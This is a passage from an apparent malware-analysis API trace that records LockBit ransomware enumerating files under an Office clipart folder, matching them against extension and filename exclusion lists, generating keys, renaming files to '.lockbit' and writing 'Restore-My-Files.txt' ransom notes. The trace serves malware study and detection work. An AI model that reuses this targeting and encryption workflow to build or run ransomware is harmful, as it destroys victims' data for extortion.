lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.470] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.lockbit") returned 72 [0113.470] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0113.471] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.471] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.471] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=13042) returned 1 [0113.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.472] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.472] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.479] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.479] malloc (_Size=0xa6) returned 0x77d7a8 [0113.479] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.480] free (_Block=0x77d7a8) [0113.480] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.480] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.480] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.480] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc465ee00, ftCreationTime.dwHighDateTime=0x1bd4bff, ftLastAccessTime.dwLowDateTime=0x608b7590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc465ee00, ftLastWriteTime.dwHighDateTime=0x1bd4bff, nFileSizeHigh=0x0, nFileSizeLow=0xa8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED00172_.WMF", cAlternateFileName="")) returned 1 [0113.480] lstrcmpiW (lpString1=".", lpString2="ED00172_.WMF") returned -1 [0113.480] lstrcmpiW (lpString1="..", lpString2="ED00172_.WMF") returned -1 [0113.480] PathFindExtensionW (pszPath="ED00172_.WMF") returned=".WMF" [0113.480] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.480] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.480] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.481] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.482] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.482] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ED00172_.WMF") returned 1 [0113.482] lstrcmpiW (lpString1="ntldr", lpString2="ED00172_.WMF") returned 1 [0113.482] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ED00172_.WMF") returned 1 [0113.482] lstrcmpiW (lpString1="bootsect.bak", lpString2="ED00172_.WMF") returned -1 [0113.482] lstrcmpiW (lpString1="autorun.inf", lpString2="ED00172_.WMF") returned -1 [0113.483] lstrcmpiW (lpString1="thumbs.db", lpString2="ED00172_.WMF") returned 1 [0113.483] lstrcmpiW (lpString1="iconcache.db", lpString2="ED00172_.WMF") returned 1 [0113.483] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.483] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned=".WMF" [0113.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.483] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.483] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.484] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.484] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.484] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.484] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.484] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.484] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.484] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.484] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.lockbit") returned 72 [0113.484] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0113.489] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.489] malloc (_Size=0x40068) returned 0x3db04c0 [0113.489] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=2700) returned 1 [0113.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0113.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0113.491] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0113.493] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.493] malloc (_Size=0xa6) returned 0x77d7a8 [0113.493] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.494] free (_Block=0x77d7a8) [0113.494] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.495] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.495] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.495] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95cb3000, ftCreationTime.dwHighDateTime=0x1bd4c5e, ftLastAccessTime.dwLowDateTime=0x51f70990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95cb3000, ftLastWriteTime.dwHighDateTime=0x1bd4c5e, nFileSizeHigh=0x0, nFileSizeLow=0x1b2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED00184_.WMF", cAlternateFileName="")) returned 1 [0113.495] lstrcmpiW (lpString1=".", lpString2="ED00184_.WMF") returned -1 [0113.495] lstrcmpiW (lpString1="..", lpString2="ED00184_.WMF") returned -1 [0113.495] PathFindExtensionW (pszPath="ED00184_.WMF") returned=".WMF" [0113.495] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.495] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.496] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.496] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ED00184_.WMF") returned 1 [0113.497] lstrcmpiW (lpString1="ntldr", lpString2="ED00184_.WMF") returned 1 [0113.497] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ED00184_.WMF") returned 1 [0113.497] lstrcmpiW (lpString1="bootsect.bak", lpString2="ED00184_.WMF") returned -1 [0113.497] lstrcmpiW (lpString1="autorun.inf", lpString2="ED00184_.WMF") returned -1 [0113.497] lstrcmpiW (lpString1="thumbs.db", lpString2="ED00184_.WMF") returned 1 [0113.497] lstrcmpiW (lpString1="iconcache.db", lpString2="ED00184_.WMF") returned 1 [0113.497] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.497] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned=".WMF" [0113.497] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.497] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.497] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.498] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.498] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.lockbit") returned 72 [0113.498] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0113.503] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.503] malloc (_Size=0x40068) returned 0x3e70008 [0113.503] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=6958) returned 1 [0113.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0113.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0113.504] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.506] malloc (_Size=0xa6) returned 0x77d7a8 [0113.506] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.507] free (_Block=0x77d7a8) [0113.507] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.507] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.507] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d81900, ftCreationTime.dwHighDateTime=0x1bd4b37, ftLastAccessTime.dwLowDateTime=0x609299b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x27d81900, ftLastWriteTime.dwHighDateTime=0x1bd4b37, nFileSizeHigh=0x0, nFileSizeLow=0x3670, dwReserved0=0x0, dwReserved1=0x0, cFileName="EN00006_.WMF", cAlternateFileName="")) returned 1 [0113.507] lstrcmpiW (lpString1=".", lpString2="EN00006_.WMF") returned -1 [0113.507] lstrcmpiW (lpString1="..", lpString2="EN00006_.WMF") returned -1 [0113.508] PathFindExtensionW (pszPath="EN00006_.WMF") returned=".WMF" [0113.508] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.508] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.509] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.509] 